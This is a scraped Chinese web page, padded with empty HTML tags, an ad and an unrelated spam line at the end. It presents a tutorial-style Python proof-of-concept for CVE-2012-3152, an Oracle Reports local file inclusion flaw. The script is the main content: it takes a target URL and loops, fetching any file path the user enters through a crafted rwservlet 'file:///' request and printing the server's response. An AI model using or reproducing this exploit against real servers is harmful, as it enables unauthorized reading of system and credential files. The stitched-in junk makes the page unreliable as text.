<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                ThinkChat2.0新版上線,更智能更精彩,支持會話、畫圖、視頻、閱讀、搜索等,送10W Token,即刻開啟你的AI之旅 廣告
                # CVE-2012-3152 --- 這一小段代碼是演示的CVE-2012-3152 Oracle本地文件包含的漏洞利用PoC,與前一個PoC示例有點類似,也是通過循環可以無限輸入需要訪問文件目錄。對于下面這一段腳本無前面有點不同。增加了一點交互性的東西。通過[termcolor](https://pypi.python.org/packages/source/t/termcolor/termcolor-1.1.0.tar.gz)模塊來實現: ``` #!/usr/bin/python import sys, urllib2 # 導入需要的包 from termcolor import colored # 這里需要下載"termcolor"模塊 if len(sys.argv) != 2: # 檢查輸入的格式是否正確"<script> <URL>" print "Usage: "+sys.argv[0]+" <URL>" sys.exit(0) URL=sys.argv[1] # 輸出測試的URL print "[+] Attempting CVE-2012-3152 - Oracle Reports LFI" while True: # 循環開始時先輸出 "~$ " 然后通過"raw_input"獲取要執行的命令 resource=raw_input(colored("~$ ", "red")) req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///'+resource+'"' try: # 使用Try/Except處理響應信息 response=urllib2.urlopen(URL+req) # 發起請求并且顯示響應內容 for line in response.readlines(): print line.strip() except Exception as e: print e ``` ![oracle](img/0x15.png)
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看